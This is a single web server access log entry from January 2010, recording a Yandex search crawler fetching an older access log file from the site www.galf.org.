87.250.252.242 - - [10/Jan/2010:21:34:31 -0800] "GET /logs/access_090824.log HTTP/1.1" 200 5268694 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
